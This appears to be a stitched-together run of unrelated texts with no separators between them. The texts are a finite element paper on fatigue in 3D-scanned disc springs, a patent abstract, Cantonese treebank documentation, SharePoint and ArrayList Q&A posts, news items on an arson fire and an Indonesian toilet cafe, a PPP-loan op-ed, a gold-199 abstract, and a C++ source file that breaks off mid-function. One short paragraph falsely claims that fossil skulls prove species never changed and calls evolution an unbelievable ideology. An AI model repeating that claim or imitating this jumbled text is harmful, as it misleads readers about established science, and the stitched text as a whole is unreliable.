surface mesh and is converted into a volume tetrahedron mesh by the free mesher implemented in Abaqus/CAE. Mesh size cannot be controlled actively, but only by changing the mesh size of the imported surface mesh. The surface mesh size is adjusted by exporting very fine surface meshes from the 3D-scanning software GOM Scan and increasing the mesh size using the quadric edge collapse decimation algorithm \[[@B76-materials-13-01661]\]. In this application, quadric edge collapse is especially suitable because it reduces the mesh size at the flat surfaces, where the mesh may be more coarse, and keeps it nearly constant at the edges, where a fine mesh is needed. In the approach described in this paper, the finite element analysis utilizes a purely elastic material law. Residual stresses are incorporated by superposition of the measured stresses committed by the user. This is implemented by building two axisymmetric field outputs, one for $\sigma_{{residual},\tan}$ and one for $\sigma_{{residual},{rad}}$, in Abaqus/CAE. These output fields will later be used for the computation of $\sigma_{I,\min}$, $\sigma_{I,\max}$, $\sigma_{{II},\min}$, and $\sigma_{{II},\max}$ according to Equations ([24](#FD24-materials-13-01661){ref-type="disp-formula"}) to ([27](#FD27-materials-13-01661){ref-type="disp-formula"}). To introduce inertia and improve convergence, a volumetric mass density is defined for the disc spring. Because the spring was aligned beforehand, the assembly is straightforward. All four parts are joined in an assembly with a single coordinate system. The lower plate, the disc spring, and the guide pin are already in place. The upper plate is positioned in its place by a translation along the *y*-axis. The lower plate and the guide pin are fixed in space, and loads are applied to the upper plate. To improve convergence, a small gravitational load is defined. No other loads are applied directly to the disc. Forces are transmitted via contacts. Surface to surface contacts are defined between the disc spring and each of the other part instances. The Abaqus Scripting interface includes an option to customize output requests. This option is used in the algorithm to request stress and coordinate outputs. However, coordinates cannot be requested at integration points by means of the Scripting interface. Coordinate data in the integration points are necessary to compute residual stresses in the integration points. A job instance is created to generate an input file. The input file is manipulated to create an output request for coordinate information in the integration points, and a second job instance pointing to the new input file is created. This way, a job is created that is identical to the first job except that it includes an output request for coordinate information in the integration points. The second job is converted into a system of partial differential equations and solved using Abaqus/Standard. 4.3. Computing Stresses and Walker Damage Parameters {#sec4dot3-materials-13-01661} ---------------------------------------------------- After solving the system of partial differential equations for the displacements of the nodes in the model, Abaqus/Standard computes stresses and coordinates in the integration points at different points in step-time, which refer to the minimum and the maximum load. In this section, the computation of Walker damage parameters at the surface of the disc spring between Edge II and Edge III (see [Figure 4](#materials-13-01661-f004){ref-type="fig"}) is described. Here, we may assume a plane stress state with a dominating tension component:$$\sigma_{{load},{II},\min} = 0 \vee \sigma_{{load},{III},\min} = 0$$ $$\sigma_{{load},{II},\max} = 0 \vee \sigma_{{load},{III},\max} = 0$$ For integration points close to the surface, this is approximately true. The assumption becomes more realistic with a finer mesh and is true with an infinitesimal mesh size. The minimal and maximal stress components $\sigma_{{load},{II},\min}^{\prime}$ and $\sigma_{{load},{II},\max}^{\prime}$ are redefined:$$\sigma_{{load},{II},\min}^{\prime} = \sigma_{{load},{II},\min} + \sigma_{{load},{III},\min}$$ $$\sigma_{{load},{II},\max}^{\prime} = \sigma_{{load},{II},\max} + \sigma_{{load},{III},\max}$$ In the surface of disc springs, $\sigma_{{load},I}$ points in the tangential direction and $\sigma_{{load},{II}}^{\prime}$ points in the radial direction. Residual stresses are measured in the tangential direction ($\sigma_{{residual},\tan}$) and in the radial direction ($\sigma_{{residual},{rad}}$). The input stresses for the computation of the Walker damage parameters are defined as:$$\sigma_{I,\max} = \sigma_{{load},I,\max} + \sigma_{{residual},\tan}$$ $$\sigma_{{II},\max} = \sigma_{{load},{II},\max}^{\prime} + \sigma_{{residual},{rad}}$$ $$\sigma_{I,\min} = \sigma_{{load},I,\min} + \sigma_{{residual},\tan}$$ $$\sigma_{{II},\min} = \sigma_{{load},{II},\min}^{\prime} + \sigma_{{residual},{rad}}$$ Walker damage parameters are computed according to Equations ([1](#FD1-materials-13-01661){ref-type="disp-formula"}) to ([11](#FD11-materials-13-01661){ref-type="disp-formula"}). For each surface triangle, a surface area $A_{i}$ and a Walker damage parameter $P_{{Walker},i}$ are computed. The surface Walker damage parameter is computed by averaging the Walker damage parameters of the neighboring nodes. These data pairs are saved as the set *S*. 4.4. Extracting Tabular Data {#sec4dot4-materials-13-01661} ---------------------------- The set *S* is too rich in information to be captured holistically without extraction and/or condensation. This is done by transforming the information into tabular data. Therefore, it is condensed into human readable tabular data. Each element of the set is defined as a Dirac delta function:$$f_{i}\left( P_{Walker} \right) = A_{i} \cdot \delta\left( {P_{Walker} - P_{{Walker},i}} \right)$$ The accumulated surface area $A_{acc}$ assigned to a given Walker damage parameter is computed as:$$A_{acc}\left( P_{Walker} \right) = \int_{P_{Walker}}^{\infty}\sum\limits_{i}f_{i}\left( P_{Walker} \right)dP_{Walker}$$ It describes the size of the surface area of the disc spring with a Walker damage equal to or greater than the given $P_{Walker}$. A graphical representation \[[@B77-materials-13-01661]\] of the accumulated surface area is created. 5. Example Application {#sec5-materials-13-01661} ====================== In this section, an example application of the algorithm presented in [Section 3](#sec3-materials-13-01661){ref-type="sec"} is given. A single disc spring was modelled. The surface mesh of the disc spring under investigation is presented in [Figure 5](#materials-13-01661-f005){ref-type="fig"}. The mesh was obtained using the commercially available 3D-scanning device GOM ATOS and the software GOM Scan. The number of surface triangles was already reduced for the displayed mesh, from 253,904 to 50,152. Convergence studies with different loads showed this mesh to be a good compromise between computational cost (about seven hours of CPU time on a i7-9800X and 16 GB of RAM vs. about 110 h of CPU time and 115 GB of RAM for the 253,904 surface triangle model) and accuracy (no significant bias of the Walker damage-surface area plot) \[[@B4-materials-13-01661]\]. Additionally, an idealized geometry derived from the scanned data is presented in [Figure 4](#materials-13-01661-f004){ref-type="fig"}. Edges I to IV are labelled for the reader's orientation. A major difference between both geometries is that the surfaces between Edges I and IV, as well as II and III of the idealized geometry are straight, while those of the 3D-scanned disc spring are curved. This is also visible in [Figure 6](#materials-13-01661-f006){ref-type="fig"}. Of course, the 3D-scanned geometry also was not perfectly symmetric. In [Figure 7](#materials-13-01661-f007){ref-type="fig"}, the geometry according to the standard \[[@B1-materials-13-01661]\] is presented. It differs from the idealized geometry in having sharp edges and all angles between faces being 90°. This simplified geometry is usually utilized for the analysis of disc springs, regardless of whether analytical formulas or finite element models are used. The triangle surface mesh was aligned and imported into Abaqus/CAE. Afterwards, it was converted into a tetrahedron volume mesh using the `generateMesh` method included in Abaqus Scripting \[[@B71-materials-13-01661]\]. The resulting linear tetrahedron C3D4 mesh was converted into a quadratic C3D10 mesh. Modified quadratic tetrahedrons C3D10M offer improved contact behaviour \[[@B78-materials-13-01661]\]; however, due to poor mesh quality, C3D10 tetrahedrons performed better in our experience. The elements were assigned a Young's modulus of 206,000 MPa, a Poisson ratio of 0.3, and a volumetric mass density of 8.05 g/mm${}^{3}$. The volumetrically meshed disc spring was incorporated into an assembly. The load cycle was implemented in four steps. To obtain good convergence behavior, the steps were defined as dynamic steps. The implicit solver Abaqus/Standard was used. The purpose of Step 1 was to apply the lower load. Step 2 was to make sure there was no dynamic influence on the computed stresses. Step 3 was to apply the higher load. Step 4 was, again, implemented to eliminate dynamic influences. Step times for Steps 1 to 4 were 10 s, 1 s, 10 s. and 1 s. The boundary conditions were applied to the upper plate as displacements in the axial direction at a reference point; see [Figure 6](#materials-13-01661-f006){ref-type="fig"}. The prescribed displacements were 0.425 mm for Steps 1 and 2 and 1.19 mm for Steps 3 and 4. All other degrees of freedom of the reference points were fixed to zero. For the lower plate, all degrees of freedom were fixed to zero. All contact formulations used in this model were defined as surface-to-surface contacts with a finite sliding penalty formulation and a friction coefficient of 0.01. A job was created and committed to the solver Abaqus/Standard. The resulting output database was loaded. The resulting highest tensile load stresses in a cross-section are displayed in [Figure 8](#materials-13-01661-f008){ref-type="fig"}. The upper half of the disc spring was loaded compressively. This is why disc springs in general break between Edges II and III. Two field outputs representing residual stresses in the tangential and radial direction were generated based on user input and the initial coordinates of the integration points (which were requested as outputs earlier). Since the measured residual stresses for the spring under investigation are confidential, the used inputs values were not the result of a measurement. They were however realistic for disc springs. The residual stresses between Edges II and III were approximated by a linear function, ignoring non-symmetric effects. The computed residual stresses were obviously wrong anywhere else. This does not matter here because the Walker damage parameter is a measure used to predict fracture. Fracture is initiated by cracks, which normally initiate from the surface between Edges II and III \[[@B79-materials-13-01661]\]. Cracks originating from between Edges I and IV are usually caused by too low preloading forces. The bias in the Walker damage parameter introduced outside the surface between Edges II and III is non-conservative. Therefore a false positive for fracture in this area can be ruled out. The computed output fields between Edges II and III are displayed in [Figure 9](#materials-13-01661-f009){ref-type="fig"}. The significantly higher residual stresses in the tangential direction compared to the radial direction are normal in disc springs because disc springs are overloaded in production to prevent plastic deformation in use, to increase lifetime, and to decrease creep effects \[[@B80-materials-13-01661],[@B81-materials-13-01661],[@B82-materials-13-01661],[@B83-materials-13-01661],[@B84-materials-13-01661],[@B85-materials-13-01661]\]. The output fields resulting from the finite element simulation describing stresses after Step 2 and the output fields describing the residual stresses were added up to compute output fields describing $\sigma_{I,\max}$ and $\sigma_{{II},\max}$. The calculation followed Equations ([24](#FD24-materials-13-01661){ref-type="disp-formula"}) and ([25](#FD25-materials-13-01661){ref-type="disp-formula"}). Field outputs describing $\sigma_{I,\min}$ and $\sigma_{{II},\min}$ were computed following Equations ([26](#FD26-materials-13-01661){ref-type="disp-formula"}) and ([27](#FD27-materials-13-01661){ref-type="disp-formula"}). Based on these, field outputs describing the minimum and maximum equivalent stress, $\sigma_{\min}$ and $\sigma_{\max}$, were computed according to Equations ([2](#FD2-materials-13-01661){ref-type="disp-formula"}) and ([3](#FD3-materials-13-01661){ref-type="disp-formula"}); see [Figure 10](#materials-13-01661-f010){ref-type="fig"}. Especially in the minimum equivalent von Mises stress visualization, the contact line between the disc spring and the lower plate can be identified by a circle of locations with high compressive stresses. These output fields were used to compute the output fields representing the stress amplitude $\sigma_{amp}$ according to Equation ([4](#FD4-materials-13-01661){ref-type="disp-formula"}) and finally the Walker damage parameter $P_{Walker}$ according to Equation ([1](#FD1-materials-13-01661){ref-type="disp-formula"}); see [Figure 11](#materials-13-01661-f011){ref-type="fig"}. The Walker exponent $\gamma = 0.5$ was used, which makes the Walker damage parameter equivalent to the Smith--Watson--Topper damage parameter. Compared to the other fields, the stress amplitude field was very smooth. The reason for this is that the elastic deformation of the spring partially compensated for the small asymmetries that were present. For higher load increments, the additional elastic stresses were therefore distributed more homogeneously. The algorithm created a list of all surface triangles and computed an average Walker damage parameter $P_{{Walker},i}$, as well as a surface area $A_{i}$ for each triangle. The graph of the accumulated surface area over the Walker damage parameter was created; see [Figure 12](#materials-13-01661-f012){ref-type="fig"}. From this particular graph, the user can for example extract the surface area where the Walker damage parameter is over 750 MPa, which is 4.9 mm${}^{2}$. About half of the surface had a Walker damage parameter of zero because stresses there were purely compressive; see [Figure 12](#materials-13-01661-f012){ref-type="fig"}. This surface corresponds to the dark blue parts of the surface in [Figure 8](#materials-13-01661-f008){ref-type="fig"}. As can be seen on the graph on the right, the function starts to jump at high stresses. This is because Walker damage parameters were averaged over surface triangles. The part of the graph at very high stresses exists purely because of numerical singularities and therefore does not correspond to the fatigue behaviour of the disc spring. The Walker damage parameter is not directly accessible through experiments. To evaluate the quality of the finite element model, a characteristic derived from a similar model (only boundary conditions were changed) was compared to a characteristic obtained in an experiment; see [Figure 13](#materials-13-01661-f013){ref-type="fig"}. As is customary for disc springs, the deflection was normalized over the deflection at which the disc spring lies flat on the ground. They agree well; especially, the correct representation of the progressive behaviour at the very start of the experiment has only been achieved by models directly implementing 3D-scanned geometry. To our knowledge, all published models directly implementing 3D-scanned geometry have been created using the algorithm presented in [Section 3](#sec3-materials-13-01661){ref-type="sec"}. The numerical characteristic is somewhat stiffer than the experimental one. This may be due to a misrepresentation of Young's modulus, which was set to the normative default of 206,000 MPa; however, tensile tests on specimens from the same batch of material and a similar heat treatment did not show a sufficient deviation in Young's modulus to use a lower value. 6. Summary {#sec6-materials-13-01661} ========== A novel algorithm as implemented in the Spring_stack module was presented in this paper. The algorithm receives geometry data, residual stresses, material parameters, load cases, and further inputs and builds an FE model based on these. It evaluates the FE model after solving with respect to the Walker damage inflicted locally using a Manson--McKnight approach. In a post-processing step, the accumulated surface area as a function of the Walker damage parameter is computed. An example application of the algorithm was presented. Conceptualization, M.B.G. and M.K.; methodology, M.B.G., M.K., and M.O.; software, M.B.G.; formal analysis, M.B.G., M.K., and M.O.; resources, M.O.; writing, original draft preparation, M.B.G.; writing, review and editing, M.K. and M.O.; visualization, M.B.G.; supervision, M.O.; project administration, M.K.; funding acquisition, M.O. All authors read and agreed to the published version of the manuscript. This article was created as part of the research project AVIF A 309 'Bewertung des Einflusses realer Bauteilgeometrien auf die Beanspruchbarkeit von Tellerfedern anhand numerischer Simulation" (assessment of the influence of real geometries on the load capacity of disc springs by numerical simulation). This project is funded by Stiftung Stahlanwendungsforschung, which is part of Stifterverband für die Deutsche Wissenschaft e.V. (Donors' Association for the Promotion of Science and Humanities in Germany). The Association's mission is the promotion of research into the manufacturing and utilization of steel in Germany. The research proposal was audited by a panel of experts from the Research Association of the Working Group of the Iron- and Metal-processing Industries (AVIF), which is composed of specialists from the steelworking industry and academia. The project is accompanied by a working group from the Association of the German Spring Industry (VDFI). The authors declare no conflict of interest. ![Planar stress with the von Mises equivalent (zero shear).](materials-13-01661-g001){#materials-13-01661-f001} ![Simplified flowchart of the algorithm.](materials-13-01661-g002){#materials-13-01661-f002} ![Flowchart of the sub-pipeline 'build model'.](materials-13-01661-g003){#materials-13-01661-f003} ![Idealized geometry of the spring under investigation.](materials-13-01661-g004){#materials-13-01661-f004} ![3D-scanned, coarsened surface mesh of the disc spring under investigation.](materials-13-01661-g005){#materials-13-01661-f005} ![Boundary conditions defined for the finite element model.](materials-13-01661-g006){#materials-13-01661-f006} ![Geometry of the spring under investigation according to EN 16983 \[[@B1-materials-13-01661]\].](materials-13-01661-g007){#materials-13-01661-f007} ![Computed compressive (deep blue, without detailed scale) and computed highest tensile (colored scale) load stresses in the fully loaded cross-section in MPa.](materials-13-01661-g008){#materials-13-01661-f008} ![Residual stresses $\sigma_{{residual},\tan}$ and $\sigma_{{residual},{rad}}$ in the tangential (**left**) and radial (**right**) direction in MPa.](materials-13-01661-g009){#materials-13-01661-f009} ![Minimum and maximum equivalent von Mises stress $\sigma_{\min}$ (**left**) and $\sigma_{\max}$ (**right**) in MPa.](materials-13-01661-g010){#materials-13-01661-f010} ![Stress amplitude $\sigma_{amp}$ (**left**) and Walker damage $P_{Walker}$ (**right**) in MPa.](materials-13-01661-g011){#materials-13-01661-f011} ![Accumulated surface area of the disc spring over Walker damage.](materials-13-01661-g012){#materials-13-01661-f012} ![Comparison of characteristics obtained from numerical simulation and from the experiment.](materials-13-01661-g013){#materials-13-01661-f013}
The present invention relates to an electric equipment remote control adapter using telephone lines. A conventional remote control means for controlling electric equipment such as a video tape recorder or a television set (to be referred to as a VCR or TV hereinafter) by using telephone lines has been previously disclosed by the present applicant in U.S. Pat. No. 4,540,851. However, to use such a remote control means, a VCR or TV proper should be modified for interface problem. It is therefore not practical to use such a remote control means to be incorporated with a home VCR which may be controlled by telephone line from outside.
--- layout: relation title: 'cc' shortdef: 'coordinating conjunction' udver: '2' --- The coordinating conjunction links a conjunction word to its immediately following conjunct as its head. (See [CCONJ]() for a list of Cantonese conjunction words.) ~~~ conllu # visual-style 4 2 cc color:blue # visual-style 2 bgColor:blue # visual-style 2 fgColor:white # visual-style 4 bgColor:blue # visual-style 4 fgColor:white 1 中文 _ NOUN _ _ 0 root _ Chinese-language 2 同 _ CCONJ _ _ 4 cc _ and 3 中國 _ PROPN _ _ 4 compound _ China 4 歷史 _ NOUN _ _ 1 conj _ history 1 "Chinese _ _ _ _ 0 _ _ _ 2 language _ _ _ _ 0 _ _ _ 3 and _ _ _ _ 0 _ _ _ 4 Chinese _ _ _ _ 0 _ _ _ 5 history" _ _ _ _ 0 _ _ _ ~~~ ~~~ conllu # visual-style 7 4 cc color:blue # visual-style 4 bgColor:blue # visual-style 4 fgColor:white # visual-style 7 bgColor:blue # visual-style 7 fgColor:white 1 佢 _ PRON _ _ 2 nsubj _ 3SG 2 去 _ VERB _ _ 0 root _ go 3 , _ PUNCT _ _ 7 punct _ _ 4 但係 _ CCONJ _ _ 7 cc _ but 5 我 _ PRON _ _ 7 nsubj _ 1SG 6 唔 _ ADV _ _ 7 advmod _ NEG 7 去 _ VERB _ _ 2 conj _ go 1 "She's _ _ _ _ 0 _ _ _ 2 going, _ _ _ _ 0 _ _ _ 3 but _ _ _ _ 0 _ _ _ 4 I'm _ _ _ _ 0 _ _ _ 5 not _ _ _ _ 0 _ _ _ 6 going." _ _ _ _ 0 _ _ _ ~~~
Q: Immediate Redirect page from root to communication site How do I redirect to a site collection in SPO without ANY lag? The root https://******.sharepoint.com now has a simple javascript redirect: window.location.href = 'https://******.sharepoint.com/sites/home'; The problem is there a delay. Even placing a redirect in the <meta> head area and setting it to zero still has a lag in the redirect: <meta HTTP-EQUIV=”REFRESH” content=”0”; url=”https://******.sharepoint.com/sites/Home”> <meta http-equiv="refresh" content="0; ,URL=https://******.sharepoint.com/sites/Home"> <meta http-equiv="refresh" content="0;URL='https://******.sharepoint.com/sites/Home'" /> this might be of interest: immediate redirect IIS The only other way I know to avoid a lag in the redirect is a Powershell script. #Connect to the SharePoint Online Site $Username = "Anupam.Shrivastava@mytenant.onmicrosoft.com" $Password = Read-Host -Prompt "Please enter your password" -AsSecureString $Site = "https://myteant.sharepoint.com/sites/SC2" $Context = New-Object Microsoft.SharePoint.Client.ClientContext($Site) $Creds = New-Object Microsoft.SharePoint.Client.SharePointOnlineCredentials($Username,$Password) $Context.Credentials = $Creds   #Update the welcome page $web = $Context.Web $rootFolder = $web.RootFolder; $rootFolder.WelcomePage = "SitePages/New Home.aspx"; $rootFolder.Update(); $Context.ExecuteQuery(); A: This was not working well because I made a modern page off the root classic site. I input a SPFX web part that loaded JS. This is too many moving parts... An effective way to do this is to create a classic page. I created a web part classic page and placed the JavaScript in the top of the page. I found that the issue is the modern pages. The load time is much better for classic pages. Make the homepage a classic page with window.location.href = 'https://******.sharepoint.com/sites/home'; and it should work fine.
Q: Is there a way to deep copy non serializable object? I have to copy an Arraylist to a new Arraylist. In the old Arraylist there are multiple elements which changes at runtime.One of them is the module settings parameter inside the Arraylist. I would like to deep copy the values of the arraylist so that I can use it for undo operation. I tried using Binaryformater and Datacontract. Both can't be done for non serializable object. Can anyone help , pls? A: Without more information it's hard to say exactly what's wrong, but ArrayList itself is serializable. However, if you are using a custom object you need to mark it as serializable for serialization to work. See: Serialize ArrayList of Objects
Arson displaces 9 adults, 4 children in Manchester Officials said a fire Friday morning a west side apartment building in Manchester was intentionally set. The two-alarm fire on Manchester's Rimmon Street started in the trash bin against the garage. The flames spread into the garage, which was engulfed when crews arrived. The flames also spread into the back section of the three-story apartment building. Two other nearby buildings, a garage, a car and power lines all suffered heat damage. Officials estimated about $150,000 in damages to the apartment building itself, and more than $15,000 to the other buildings. All of the residents, including nine adults and four children, were displaced. No one was injured, and all of the residents escaped safely thanks to police, fire crews, and another person who ran back in to help the others. "We were actually sleeping and we heard people screaming outside, so my boyfriend came to the window and lifted up the window and he was like, 'Oh my gosh, there's a fire across the street.' So, we ran outside across the street and saw the fire," said witness Cameron Arnault. Crews contained the flames by 1 a.m. Officials are investigating if the arson is connected to other suspicious fires in Manchester in 2012. The building is owned by Fern and Linda Vachon, who recently returned from vacation. The Red Cross is helping victims of the fire. Copyright 2013 by WMUR.com. All rights reserved. This material may not be published, broadcast, rewritten or redistributed.
Stampede for emergency loans is crushing lenders, putting millions of small businesses at risk. Here are steps to fix the system Seth Levine, founding partner of Foundry Group, and Elizabeth MacBride, founder of Times of Entrepreneurship Key Points Small businesses all over the U.S. are scrambling to understand the options available to them under various government programs enacted to blunt the economic blow caused by COVID-19. But the relief offered under the Coronavirus, Aid, Relief and Economic Security (CARES) Act is slow, piecemeal and confusing. The delays gaining access to SBA-backed emergency loans under the $349 billion Paycheck Protection Program are putting millions of businesses at risk of closing, threatening their employees, suppliers and communities. Major banks and community lenders are unprepared to handle the influx of applications. Temporary closed signage is seen at a store in Manhattan borough following the outbreak of coronavirus disease (COVID-19), in New York City, U.S., March 15, 2020. Jeenah Moon | Reuters The relief offered under the Coronavirus, Aid, Relief and Economic Security (CARES) Act is slow, piecemeal and confusing. The delays are putting millions of businesses at risk of closing, threatening their employees, their suppliers and their communities. This is putting us all at risk of a deeper recession. Last Tuesday the Small Business Administration launched a disaster-aid recovery portal, repeating the promise contained in the CARES Act: The first round of aid would be delivered within three days. It has not arrived. On Friday the U.S. government tried to launch the $349 billion Paycheck Protection Program as part of the CARES Act. The PPP is being administered through the existing banking systems of Small Business Administration lenders. Some banks weren't ready. Some are already inundated. Meanwhile, anger over both these programs is building in the small business community. They don't even know the half of it. As the program rolls out further, more flaws are likely to become apparent. The confusing legislation favors companies that already have relationships with lenders and leaves out many of the most vulnerable businesses. The smallest companies, with fewer than 50 employees, have borne the brunt of the initial crisis, cutting 90,000 jobs in March, according to an ADP survey. They're the restaurants, gyms and corner stores. They had the least cash — an average of 15 days' worth, according to JPMorgan Chase Institute research. They have had to lay off their employees, who are often also friends. Now they're watching their life's work crumble. And it's likely this aid will leave many of them out entirely. The Foundry Group has spent hundreds of collective hours this week studying these programs and communicating updates to companies in its portfolio. The banks that are rolling out the program are unprepared and lack basic guidance from the SBA and Treasury on key details of the application process and the overall program. Treasury guidance is often internally conflicting — for example, on the question of whether 1099 contractors can be counted by companies as they calculate their potential loan amounts. Companies that are backed by professional investors, with all the experience, resource and expertise that entails, are having trouble making sense of the options available to keep employees on payroll as businesses absorb the initial shock of the shutdown. The PPP loan program needs immediate clarification and to be streamlined. That should be the first priority of the newly appointed Coronavirus Recovery Czar. Congress did the right thing in making portions of the aid programs forgivable so that the most vulnerable businesses won't be hobbled by debt, but is the money allocated by Congress going to get to them in time? Or, in many cases, going to get to them at all? These businesses are the lifeblood of America. And we're abandoning them almost completely to navigate this crisis on their own. Aid that is intended to help these businesses won't get to them if we don't take immediate steps to clarify the rules, get the technology up and running and begin a national coordinated campaign to communicate with and support all the small businesses that need help. The steps to speed help Here are steps the business community and federal government could take to speed help, probably without passing new legislation. 1. Set up individual loan funds Anticipating that the federal aid would roll out slowly, states, communities and foundations have set up their own loan funds, often with donations, community reinvestment act credits from local lenders and help from local economic development groups. There are more than 30 so far nationwide, such as this one in Louisville, Kentucky, that aims to put 0% interest loans into the bank accounts of businesses with fewer than 10 employees within a week. SBA funds could be disbursed to these loan funds, which have lines of communication to their own small business communities — and can act much faster than the federal bureaucracy. "We are disappointed in the lack of broader inclusion of community loan funds in the PPP and are hopeful that we can find a way to be partners to reach all Americans and the businesses and nonprofits who are not easily reached by the larger institutions," says Lisa Mensah, CEO of the Opportunity Finance Network, the association of community development financial institutions, which are involved in some of the new loan funds. 2. Urge big business to pay receivables faster Big companies that market to small businesses and use their services are beginning to step up, by paying their receivables faster. Last week a coalition of tech companies that serve the small business market —Alignable, Fundbox, Gusto, Homebase, Womply, SmallBizDaily.com, Actual.Agency, Business.com and Small Business Edge — introduced an initiative called #paytoday to urge big businesses to pay faster. Let's encourage a national movement around this. It's our respective civic duty as individuals and businesses to do everything we can do to support the small businesses in our communities. 3. Appoint a clear leader Whatever interagency rivalry hampers the interpretation of the rules and implementation of the programs needs to stop. This is management 101. The mobilization needs a clear leader, who will be held accountable for making sure these billion-dollar programs run smoothly and transparently. President Donald Trump should appoint such a leader immediately to oversee these programs. 4. Provide more clarity The PPP loan program needs immediate clarification and to be streamlined. That should be the first priority of the newly appointed Coronavirus Recovery Czar. 5. Expand the program Additionally, the program itself needs to be expanded. The intent of the program is to save jobs and to provide a lifeline to businesses most affected by the COVID-19 economic crisis. However, the way it's structured almost completely leaves out businesses such as restaurants, fitness facilities and other small businesses unable to operate in our current "shelter in place" society. Those businesses closed weeks ago and already laid off employees. These businesses are unable to access key parts of the program related to loan forgiveness: For instance, the ability of loans to be forgiven based on future payroll obligations cannot be accessed if companies have already closed and laid people off and are unable to reopen quickly enough. These rules need to be addressed and updated to allow businesses such as these to receive the benefit of the program as they ultimately get up and running again as society emerges from their homes. We need them to survive. And we need them to have the capital available to rehire the workers they were forced to let go as the crisis began. For the country to recover, we need small businesses. Every small business that goes under or shrinks has ripple effects — employees laid off, rents unpaid, contracts broken — that collectively puts us deeper into a recessionary hole. Small businesses are the backbone of our economy, the heart of our communities and the center of our strategy for rebuilding. The time to act to save these businesses is now. Seth Levine is a founding partner of Foundry Group, a $2.5 billion venture capital firm based in Boulder, Colorado. Elizabeth MacBride is founder of Times of Entrepreneurship, a publication covering entrepreneurs beyond Silicon Valley.
Semarang (Indonesia) (AFP) - A toilet-themed cafe where customers dine on meatballs floating in soup-filled latrines may not be everyone's idea of haute cuisine, but Indonesians are flocking to become privy to the latest lavatorial trend. Guests at the "Jamban Cafe" sit on upright toilets around a table where food is served in squat loos. On a recent visit to the venue, in Semarang on Java island, traditional Indonesian "bakso" -- a type of meatball -- bobbed in a murky soup in one toilet, while a second contained a brightly-coloured, alcohol-free cocktail. For those who found the whole experience too nauseating, there was a sick bag hanging by the entrance. Other places, such as Taiwan and Russia, are home to similar themed restaurants, but Indonesia's modest version has a key difference -- it aims to educate people about sanitation and encourage the increased use of toilets. "I was disgusted at first, but I eventually ate some of the food out of curiosity," said customer Mukodas, a 27-year-old who, like many Indonesians, goes by one name. "I think the idea is pretty interesting because if you try to have a campaign without a gimmick like this, the information won't stick." Another customer, 15-year-old Annisa Dhea, conceded she initially found the toilet treats "a bit unappealing" but felt somewhat reassured after "the owner told me that the food was clean and hygienic". The cafe -- whose name "Jamban" means toilet in Indonesian -- has been open since April and currently only welcomes small groups who book ahead. Owner Budi Laksono, a public health expert who used to work for the local government, hosts discussions with customers and shows them videos as he seeks to encourage people to use dedicated facilities for their bodily functions. Millions of Indonesians live below the poverty line and the country has one of the world's highest rates of open defecation -- defecating outside and not in a designated toilet -- a practice blamed for spreading disease. Story continues "This cafe serves as a reminder that many people in Indonesia still do not have toilets," said Laksono, 52. However he admitted that his unusual approach had sparked some controversy in the Muslim-majority country. "Many critics say the cafe is inappropriate and against Islamic law," he said.
Production assessment of non-carrier-added 199Au by (n,γ) reaction. Gold-199 is a promising theranostic radionuclide for targeted radioimmunotherapy as well as for scintigraphy and dosimetry. 199Au can be produced in two methods in the direct and indirect routes of the reactor production via 197Au(n,γ)198Au(n,γ)199Au as the direct or 198Pt(n,γ)199Pt→199Au as the indirect method. This investigation described the development of a method for the reactor production of no-carrier-added (NCA) 199Au through neutron activation of natural Pt in Tehran Research Reactor (TRR) at a thermal neutron flux of 3.5 × 1013 n cm-2 s-1. Also, in this paper, the activity of 199Au has been estimated using the MCNPX code. In this case, first, the reactor core is simulated. Then the calculated results are compared with the corresponding experimental values. Moreover, two different chemical separation methods are investigated experimentally in details.
Fossil skulls are among the best evidence that living things have never changed over the course of history, have never developed into other life forms, and that every living species has been created together with its own unique attributes. These proofs emphasize the dilemmas facing and illogicality of Darwinian thinking. The theory of evolution, which maintains that human beings are descended from apes, needs to explain why it is that no process similar to the imaginary transition from ape to human was ever undergone by any other form of life. Evolutionists have no answer to the question of why, for example, a jungle cat did not one day decide to walk upright on two legs, or why a fox did not improve its intelligence level and turn into a professor, or why a panda is unable to produce admirable works of art. Darwinism, depicted as a scientific theory, is in fact an unbelievable ideology.
/* Copyright (C) 2014-2020 FastoGT. All right reserved. This file is part of FastoNoSQL. FastoNoSQL is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. FastoNoSQL is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with FastoNoSQL. If not, see <http://www.gnu.org/licenses/>. */ #include "gui/text_converter.h" #include <string> #include <json-c/json_tokener.h> #include <common/text_decoders/base64_edcoder.h> #include <common/text_decoders/compress_bzip2_edcoder.h> #include <common/text_decoders/compress_lz4_edcoder.h> #include <common/text_decoders/compress_snappy_edcoder.h> #include <common/text_decoders/compress_zlib_edcoder.h> #include <common/text_decoders/xhex_edcoder.h> #include <common/convert2string.h> #include <fastonosql/core/types.h> namespace { struct json_object* json_tokener_parse_hacked(const char* str, int len) { struct json_tokener* tok = json_tokener_new(); if (!tok) { return nullptr; } struct json_object* obj = json_tokener_parse_ex(tok, str, len); if (tok->err != json_tokener_success) { if (obj) { json_object_put(obj); } obj = nullptr; } json_tokener_free(tok); return obj; } } // namespace namespace fastonosql { namespace gui { bool string_from_json(const convert_in_t& value, convert_out_t* out) { if (!out || value.empty()) { return false; } json_object* obj = json_tokener_parse_hacked(value.data(), static_cast<int>(value.size())); if (!obj) { return false; } size_t len = 0; const char* jstring = json_object_to_json_string_length(obj, JSON_C_TO_STRING_PLAIN, &len); *out = GEN_CMD_STRING_SIZE(jstring, len); json_object_put(obj); return true; } bool string_to_json(const convert_in_t& data, convert_out_t* out) { if (!out || data.empty()) { return false; } json_object* obj = json_tokener_parse_hacked(data.data(), static_cast<int>(data.size())); if (!obj) { return false; } size_t len = 0; const char* jstring = json_object_to_json_string_length(obj, JSON_C_TO_STRING_PRETTY, &len); *out = GEN_CMD_STRING_SIZE(jstring, len); json_object_put(obj); return true; } bool string_from_hex(const convert_in_t& value, convert_out_t* out) { common::XHexEDcoder enc(core::ReadableString::is_lower_hex); convert_out_t sout; common::Error err = enc.Decode(value, &sout); if (err) { return false; } *out = sout; return true; } bool string_to_hex(const convert_in_t& data, convert_out_t* out) { common::XHexEDcoder enc(core::ReadableString::is_lower_hex); convert_out_t sout; common::Error err = enc.Encode(data, &sout); if (err) { return false; } *out = sout; return true; } bool string_to_unicode(const convert_in_t& data, convert_out_t* 